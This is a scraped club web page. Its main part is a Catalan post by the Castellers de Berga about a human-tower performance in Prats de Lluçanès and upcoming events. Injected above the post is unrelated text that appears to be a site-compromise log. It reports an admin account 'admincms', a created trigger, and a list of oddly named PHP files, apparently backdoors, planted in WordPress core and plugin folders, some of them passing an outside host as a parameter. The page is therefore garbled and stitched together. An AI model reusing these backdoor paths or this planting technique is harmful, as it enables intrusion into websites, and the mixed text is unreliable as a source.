Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/site-health-info-private-meta-private-stream-stream-core-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/freedoms-cron-core-cron-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/install-meta-ajax-core-cron-meta-ajax-response-private-wp.php https://castellersdeberga.cat/wp-content/plugins/js_composer/js_composer-core-private-ajax-response-stream.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-private-cron-wp-private-ajax-response-meta-stream-ajax-response.php https://castellersdeberga.cat/wp-includes/nav-menu-ajax-core-private.php https://castellersdeberga.cat/wp-includes/widgets/class-wp-widget-media-video-private-private-stream-core.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Prats de Lluçanès
 

Actuació a Prats de Lluçanès


Actuació a Prats de LluçanèsDiumenge 19 de juny, vam actuar per primer vegada a Prats de Lluçanès. Ho vam fer acompanyats dels Picapolls de la Gavarresa i els Castellers de Santpedor.
Hi vam fer una bona actuació, descarregant-hi bons castells amb tranquil·litat. Vam començar amb un pilar de 4 d’entrada. A les rondes de castells, vam fer el 3de7, el 5de6 i el 4de7. Vam tancar la diada amb un pilar de 5 amb una alineació que ja feia un temps que no dúiem a plaça, fet que la colla va celebrar amb entusiasme.
Vam compartir plaça amb els Picapolls de la Gavarresa i els Castellers de Santpedor. Els Picapolls de la Gavarresa van fer molt bona actuació: dos pilars de 4, 4de6a, id5de6, 5de6, 3de6a i tres pilars de 4 per acabar. Els Castellers de Santpedor no van estar tan encertats, ja que no van poder descarregar cap castell. Van fer pilar de 4, id3de6, id4de6, i3de6a i pilar de 4.
En acabat, vam celebrar la bona actuació amb una copa de cava cortesia del bar El Contrapàs. Moltes gràcies!

El cap de setmana de Sant Joan no tenim assaig divendres ni actuació, però arriba laContracorrent, la cursa d’obstacles més boja. Enguany serà urbana, amb recorregut pel centre de Berga, i destinarà la meitat dels beneficis als refugiats sirians a Grècia. No us la deixeu perdre!

La propera actuació serà el diumenge 3 de juliol, a Centelles, amb els Sagals d’Osona i els Marrecs de Salt.

Aquí teniu algunes fotos dels castells que vam fer a Prats i el cartell de laContracorrent. Fins ben aviat!